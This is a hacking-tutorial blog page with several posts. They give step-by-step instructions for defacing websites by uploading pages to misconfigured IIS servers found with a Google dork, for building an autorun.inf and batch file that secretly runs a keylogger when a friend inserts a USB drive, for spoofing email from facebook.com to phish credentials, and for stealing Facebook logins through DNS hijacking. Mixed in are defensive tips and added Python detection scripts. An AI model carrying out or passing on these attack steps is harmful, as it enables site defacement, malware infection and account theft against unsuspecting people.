Showing posts with label beginner hacker. Show all posts

Thursday, 20 March 2014

How to Hack websites using IIS exploit | IIS File Upload exploit

This tutorial is about hacking websites that run on older versions of IIS server. We will discuss what an IIS server is and how to upload deface pages to it.

 

Q) What is IIS Server ?
A) IIS [Internet Information Services] is a web server developed by Microsoft for use with Microsoft operating systems.

How to Use IIS exploit :-

For Windows XP :
1) Go to Start, then click on Run.
2) Copy the following code and paste it into the Run command:-

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
3) Click on OK.
4) A folder named “Web Folders” will open.
5) Right click in the folder and click on “New” and then click on “Web folder”.
6) A dialogue box will open.
7) Enter the URL of the vulnerable site and click on Next.
8) If no error comes up, the site is vulnerable; otherwise try any other site.
9) After pressing “Next” in step 7 it will ask you to name that web folder; enter any name you want.
10) Open that folder and copy your defaced HTML page to that folder.
 
For Windows 7:
1) Go to My Computer >> Right Click >> Select “Add a Network Location”.
2) Click on “Next” >> Choose the first option in the next screen >> Click “Next”.
3) Now enter the URL of the vulnerable site and click on “Next”.
4) Now you will see a folder with the name of that site. Open that folder and upload that file.

The link to your defaced page will be like “http://vulnerablesite.net/mypage.html”,
where mypage.html is the defaced page I uploaded.
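From the server owner's side, Web Folders and “Add a Network Location” are WebDAV clients, so a page copied in this way typically reaches IIS as an HTTP PUT that the server answers with a 2xx status. The following is an added example, not part of the original post: it scans an IIS W3C log for write requests accepted without an authenticated user. The log lines are constructed and the field selection is an assumption about how logging is configured.

```python
WRITE_METHODS = {"PUT", "MKCOL", "MOVE", "COPY", "DELETE", "PROPPATCH"}

# Constructed sample in IIS W3C extended log format (documentation IP ranges).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2014-03-20 10:01:02 GET /index.html - 198.51.100.7 200
2014-03-20 10:01:09 OPTIONS / - 203.0.113.9 200
2014-03-20 10:01:15 PROPFIND / - 203.0.113.9 207
2014-03-20 10:01:21 PUT /mypage.html - 203.0.113.9 201
2014-03-20 10:02:40 PUT /docs/report.doc editor1 192.0.2.15 201
2014-03-20 10:03:05 PUT /test.txt - 198.51.100.44 403
"""

def find_anonymous_writes(log_text):
    """Return (timestamp, ip, method, path) for each write request that
    succeeded (2xx) without an authenticated user name."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]       # column order can change mid-file
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue                         # truncated or malformed record
        rec = dict(zip(fields, values))
        if (rec.get("cs-method", "").upper() in WRITE_METHODS
                and rec.get("sc-status", "").startswith("2")
                and rec.get("cs-username", "-") == "-"):
            hits.append((rec.get("date", "") + " " + rec.get("time", ""),
                         rec.get("c-ip", ""), rec["cs-method"], rec["cs-uri-stem"]))
    return hits

if __name__ == "__main__":
    for hit in find_anonymous_writes(SAMPLE_LOG):
        print("anonymous write accepted:", *hit)
```

Any hit means the anonymous account can write to the web root; if the site does not need Web Folders publishing, disabling WebDAV or removing Write permission for anonymous users closes this path.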


Dork : “Powered By IIS ”
Search this dork in google to search for vulnerable sites.

Some Vulnerable site:-

DNS Hijacking | How to hack Facebook accounts using it

Hi Guys, I am back after a long time and I have got something amazing for you guys. In this tutorial I am going to show you how to Hack facebook accounts by DNS hijacking!

WHAT IS DNS?

DNS is a network protocol whose job is to map a user-friendly name like tutorials for you to its corresponding IP address like “173.245.61.120”.

What is DNS Hijacking?

DNS hijacking, also known as DNS redirection, is a kind of malicious attack that overrides a computer’s TCP/IP settings to point it at a fake DNS server, thereby invalidating the default DNS settings. As we all know, the “Domain Name System (DNS)” is there to translate a user-friendly name like “google.com” to its corresponding IP address “74.125.235.46”.

So How Does DNS Hijacking Work?

As mentioned before, DNS is the system responsible for mapping user-friendly domain names to their corresponding IP addresses. This DNS server is owned and maintained by your Internet Service Provider (ISP) and many other business organizations.
By default, your computer is configured to use the DNS server from the ISP. In some cases, your computer could even use the DNS services of other organizations like Google or OpenDNS. Imagine a scenario where a hacker or a malware program gains unauthorized access to your computer and changes the DNS settings, so that your computer now uses one of the malicious DNS servers maintained by the hacker. Once this happens, the malicious DNS server could translate domain names of interesting websites (such as banks, search engines, social networking sites etc.) to IP addresses of malicious websites that have a similar design to the original site. As a result, you will be taken to a fake website rather than the one you intended to visit.


What are the Dangers of DNS Hijacking?

The dangers of DNS hijacking vary and depend upon the intention behind the attack. Several ISPs like “OpenDNS” and “Comcast” use DNS hijacking for introducing advertisements or collecting statistics. Even though doing this may cause no serious harm to the users, it is considered a violation of RFC standards for DNS responses.

Other dangers of DNS hijacking :

Pharming: This is a type of attack where a website’s traffic is redirected to a different website that is a fake one. For example, when a user tries to visit a social networking website like Facebook.com, he may be redirected to a different website that is filled with pop-ups and advertisements. This is often done by hackers in order to generate advertising revenue.
Phishing: This is a type of attack where users are redirected to a malicious website whose design (look and feel) matches exactly with the original one. For example, when a user tries to log in to his checking account, he is redirected to a malicious website that steals his login details.
So this way one can hack Facebook accounts. He can create a program to change your DNS address and redirect it to his rogue DNS address. That DNS will redirect requests for facebook.com to some fake Facebook site, a Facebook phisher that could steal your login credentials.
To know more about Phishing, read What is Phishing How to Hack Facebook accounts using Phishing

How to Prevent DNS Hijacking?

In most cases, attackers make use of malware programs like a worm to carry out DNS hijacking. These DNS hijacking trojans are usually distributed as video and audio codecs, video downloaders, YouTube downloaders or as other free utilities. So, in order to stay protected, it is recommended to stay away from untrusted websites that offer free downloads. The DNSChanger trojan is a very good example of one such malware that hijacked the DNS settings of over four million computers to drive a profit of about fourteen million USD through fraudulent advertising revenue.
Also, it is necessary to change the default password of your router, in order to stop someone from changing your router settings and exploiting your DNS settings to hack you.
Installing a genuine antivirus program and keeping it up to date offers a great deal of protection to your PC against any such attacks.

What if you are already a victim of DNS hijacking?

If you think that your computer is infected with a malware program like DNSChanger, do not panic. All you have to do is verify your current DNS settings to check whether the DNS address is the same as the one provided by your ISP. If it is not, reconfigure your DNS settings as per the instructions of your ISP.
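The check described above can be scripted. The following is an added example, not part of the original post: it reads the DNS servers out of Windows `ipconfig /all` output, including the indented continuation lines used for additional servers, and lists any that are not on the list you expect from your ISP. The sample output and the expected addresses are constructed.

```python
import ipaddress

# Constructed `ipconfig /all` excerpt; all addresses are documentation ranges.
SAMPLE = """\
Ethernet adapter Local Area Connection:

   Default Gateway . . . . . . . . . : 192.0.2.1
   DNS Servers . . . . . . . . . . . : 192.0.2.1
                                       203.0.113.66
   NetBIOS over Tcpip. . . . . . . . : Enabled

Wireless LAN adapter Wi-Fi:

   DNS Servers . . . . . . . . . . . : 198.51.100.53
"""

def _as_ip(text):
    """Return a normalised IP string, or None if text is not an address."""
    try:
        return str(ipaddress.ip_address(text.strip().split("%")[0]))
    except ValueError:
        return None

def dns_servers_by_adapter(ipconfig_text):
    """Map adapter name -> list of configured DNS server addresses."""
    result, adapter, in_dns = {}, None, False
    for line in ipconfig_text.splitlines():
        if line and not line[0].isspace():           # unindented = adapter heading
            adapter, in_dns = line.rstrip(":").strip(), False
        elif "DNS Servers" in line and " : " in line:
            in_dns = True
            ip = _as_ip(line.split(" : ", 1)[1])
            if ip:
                result.setdefault(adapter, []).append(ip)
        elif in_dns and _as_ip(line):                # continuation: bare address
            result.setdefault(adapter, []).append(_as_ip(line))
        else:
            in_dns = False
    return result

def unexpected_resolvers(ipconfig_text, expected):
    """Return (adapter, server) pairs that are not in the expected set."""
    allowed = {_as_ip(e) for e in expected}
    return [(a, s) for a, servers in dns_servers_by_adapter(ipconfig_text).items()
            for s in servers if s not in allowed]

if __name__ == "__main__":
    print(unexpected_resolvers(SAMPLE, ["192.0.2.1", "198.51.100.53"]))
```

If the only resolver listed is the router's own address, the same comparison has to be repeated on the router's DNS settings, since that is the other place the post says an attacker can change them.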
I hope you would like my articles related to Hacking and Security!
Leave your queries and feedback in the comments.

What is Autorun.inf and how to use it ? | Autorun.inf Virus

This tutorial is about using an autorun.inf file to spread a keylogger/RAT via pen drive or another removable device. A detailed tutorial about the autorun virus. Read this post carefully and don’t forget to leave your feedback in the comments.
In Windows XP it will automatically execute the instructions, while in other versions of Windows it will ask the user.


Q) What is autorun.inf?

A) The autorun.inf file is a simple text file containing a list of instructions to be followed by the operating system. Whenever a CD/USB is plugged in, the system searches for this autorun file, and if found it executes all the instructions present in this file.

Q) Why is it used?

A) It is used to execute files automatically whenever a CD/USB is plugged in. It can also change the icon of the USB/CD drive.

Steps:-

1) Creating autorun.inf :-
1.a) Open Notepad and copy the following code to it.
[autorun]
open=autorun.bat
icon=anything.ico
Here autorun.bat is the file we want to execute when our CD/USB is inserted.
Anything.ico is the name of icon file we want to set to our CD/USB drive.
2) Creating autorun.bat :-
2.a) Copy the following code [Edit it accordingly]
@echo off
start /location of the keylogger
Ex 1 :- If it is saved in a folder named rishabh which is present in the root directory of the CD/USB, then the code should be edited like this:
@echo off
start rishabh/keylogger.exe
Ex 2 :- If the keylogger is placed in the root directory then the code should be like this :-
@echo off
start keylogger.exe
2.b) Save it as autorun.bat and place it in the root directory of the CD/USB.
3) Give this CD/USB to your friends and when they insert it in their systems, they will be infected with your keylogger.

Disabling Autorun :

1) Go to RUN and type gpedit.msc and hit ok.
2) Browse to Computer Configuration >> Administrative Templates >> Windows Components >> Autoplay Policies.
3) In details pane, double-click Turn off Autoplay.
4) Click Enabled, and then select All drives in the Turn off Autoplay box to disable Autorun on all drives.
IMPORTANT NOTE :- This guide is for academic purposes solely, Use at your own risk.
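Besides turning Autoplay off, a removable drive can be inspected before anything on it is opened. The following is an added example, not part of the original post: it parses an autorun.inf file and reports every entry in the [autorun] section that would launch a program, using the `open` key shown above plus the `shellexecute` and `shell\<verb>\command` keys that autorun.inf also supports. The sample file content is constructed.

```python
import os

# Keys in the [autorun] section that make Windows launch a program.
EXEC_KEYS = ("open", "shellexecute")

# Constructed sample matching the file layout shown above.
SAMPLE = """\
[AutoRun]
; comment line
open=autorun.bat
icon=anything.ico
shell\\open\\command=autorun.bat
"""

def launch_entries(inf_text):
    """Return (key, target) pairs from the [autorun] section that start a program."""
    entries, in_section = [], False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if not in_section or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        key = key.lower()
        if key in EXEC_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            entries.append((key, value))
    return entries

def scan_drive(root):
    """Find autorun.inf (any letter case) in a drive root and report launch entries."""
    for name in os.listdir(root):
        if name.lower() == "autorun.inf":
            with open(os.path.join(root, name), "rb") as fh:
                data = fh.read()
            # Notepad may save the file as UTF-16; detect that by its byte-order mark.
            enc = "utf-16" if data[:2] in (b"\xff\xfe", b"\xfe\xff") else "utf-8-sig"
            return launch_entries(data.decode(enc, errors="replace"))
    return []

if __name__ == "__main__":
    print(launch_entries(SAMPLE))
```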

How to send an anonymous email | Create fake email sender


Hi guys! I am back with another amazing and mind-blowing tutorial for my readers. In this tutorial I am going to explain to you how to send an anonymous email to someone. You must be thinking what the purpose of sending an anonymous email is; I will be explaining that too in this detailed post.


What is Email Spoofing?
Email spoofing is the process of faking the source address of an email. It means that we can make an email appear to have been sent by someone else. This could be quite useful in various client-side hacking techniques and is an important part of social engineering.
Using email spoofing techniques you can send fake emails to users to win their trust in order to execute your attack. Since the source address will be fake (probably a mail from some famous trusted company), the victim will believe the mail and will be hacked.
Example use of email spoofing:
You can create a Facebook password change form that looks similar to that of Facebook, and then send the link of the online form to the victim by spoofing the source address as that of Facebook, like password@facebook.com or something like that. This way the user will believe that the mail is from Facebook and will surely enter his credentials.

How to send an anonymous mail :

Now let us discuss the actual steps involved in sending anonymous or fake mails.
1) You first need a fake email sender. You could either use some online fake email sender like:
Emkei.cz
anonymailer.net
Anonymizer.in
Or you could even create your own fake email sender.
2) To create your own email account spoofer you need the following things:
2.1) Fake email sender script: This is a PHP mail script with which we can change the source address of an email. Download it from here.
2.2) Free hosting service: You need a hosting service in order to host the PHP mail file. There are many free hosting services which provide a free domain too. We will use some free service like x10hosting.com. Create an account there and upload your PHP file there. Your link will be username.x10hosting.com/mail.php.
You could also try some other free web hosting service like :
phpnet.us
0000webhost.com
zymic.com
3) So now you have your own fake email sender. You now have to use this script to send fake emails to your victim.
4) In the receiver’s address add the email ID of your victim.
5) In the sender’s address add the email of some reputed company like contact@facebook.com or something like that.
6) Enter a legit-looking subject and message in order to make the victim believe in our email. Just click on the send button after that. Your victim will then receive an email from contact@facebook.com

7) You can use the same way to send fake mails from any email ID to any other email ID.
So far we have discussed how to send an anonymous email. Now I will tell you how you can distinguish between original and fake emails to protect yourself from fraud. You can check the emails you doubt using the following steps to see whether their source is legit or not.
To check the email source, follow these steps:
1) Open the email you want to check.
2) Open the email header for that email. To open the headers for an email click on “Show headers” or “Show original” (depends on the email service you are using).
3) There you will see a “received from : ” field. You will see an IP address against that field.
4) Copy the IP address and trace its location. (Will explain tracing location too in my next post.)
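The header check in the steps above, as an added example that is not part of the original post. It goes beyond the single “received from” lookup: a sender can prepend forged Received lines, so the code takes the IP only from the lowest Received header written by the recipient's own mail system, and it also reads the SPF/DKIM/DMARC verdicts from the Authentication-Results header that system stamped. The message, host names and the trusted suffix `recipient.example` are constructed assumptions.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed message (example hosts, documentation IPs); the bottom Received line is forged.
RAW = """\
Received: from mx.recipient.example ([192.0.2.10]) by inbox.recipient.example; Thu, 20 Mar 2014 10:00:05 +0000
Authentication-Results: mx.recipient.example; spf=softfail smtp.mailfrom=freehost.example; dkim=none; dmarc=fail header.from=facebook.com
Received: from web7.freehost.example ([203.0.113.25]) by mx.recipient.example; Thu, 20 Mar 2014 10:00:03 +0000
Received: from mail.facebook.com ([198.51.100.1]) by web7.freehost.example; Thu, 20 Mar 2014 10:00:01 +0000
From: Facebook <contact@facebook.com>
To: user@recipient.example
Subject: Password change

Please confirm your password.
"""

RECEIVED_RE = re.compile(r"from\s+(\S+).*?\[([0-9a-fA-F.:]+)\].*?\bby\s+([^\s;]+)", re.S)

def _trusted(host, suffix):
    return host.lower() == suffix or host.lower().endswith("." + suffix)

def handoff_ip(msg, suffix):
    """IP that connected to our own mail system: taken from the lowest Received
    header written by a trusted host. Headers below it are sender-controlled."""
    ip = None
    for header in msg.get_all("Received", []):        # newest first
        m = RECEIVED_RE.search(header)
        if not m or not _trusted(m.group(3), suffix):
            break
        ip = m.group(2)
    return ip

def auth_verdicts(msg, suffix):
    """spf/dkim/dmarc results, read only from headers our own server stamped."""
    verdicts = {}
    for header in msg.get_all("Authentication-Results", []):
        if _trusted(header.split(";", 1)[0].strip(), suffix):
            for method, result in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", header, re.I):
                verdicts.setdefault(method.lower(), result.lower())
    return verdicts

def assess(raw, suffix):
    msg = message_from_string(raw)
    verdicts = auth_verdicts(msg, suffix)
    return {"from_domain": parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower(),
            "handoff_ip": handoff_ip(msg, suffix), "auth": verdicts,
            # SPF pass alone covers the envelope sender, not the visible From.
            "from_authenticated": verdicts.get("dmarc") == "pass"}

if __name__ == "__main__": print(assess(RAW, "recipient.example"))
```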
I hope you will not use the information explained above for any type of blackhat purpose. Keep learning and Keep visiting

5 Things Every Beginner Hacker Should Know

Hello All,
This is my first blog post!


This post is for everyone out there who actually wants to become a true hacker:-



1) Never trust sites that ask you for money in return for hacking software or that claim to hack email IDs in return for money. All such things are scams. Nothing works.

2) There is NO DIRECT SOFTWARE to hack Facebook, Google, Yahoo or any other big website. All the software that claims to do so is a scam. It is just meant to take your money, and in worse cases it has trojans or keyloggers in it. As a result your account gets hacked while trying to hack others.
3) NEVER EVER use the keyloggers or trojans you find as freeware on the internet. Hackers are not fools. They bundle keyloggers and trojans with almost any such software, and when you install it, you are already hacked before even trying to hack others.
4) You are never going to be a good hacker without knowledge of programming and scripting languages. If you only use ready-made software and depend on it for hacking anything, then your functionality will be limited to the functionality of the software. If you are not going to use your brain and just do the copy-paste thing, then how can you even think of being a good hacker?
5) If you are a good hacker, you already become a good programmer, a good script writer, a good web developer and an excellent security expert. Any good hacker will/should have good knowledge of various aspects and programming languages. To do XSS (Cross Site Scripting), PHP INJECTION, SQL INJECTION, PHISHING, FOOTPRINTING etc. you will have to be good at programming and scripting. And when you know the various loopholes, vulnerabilities and security tips, you already become a computer security expert.
So never ever underestimate the term hacker. A hacker is not a person who just hacks email IDs or servers; a true hacker is a computer genius who has knowledge of computers more than anyone.
Next time think before asking the question – “How much will I get in this field?” because, if you have so many skills, you really don’t have to run after money. Success comes and money follows by itself.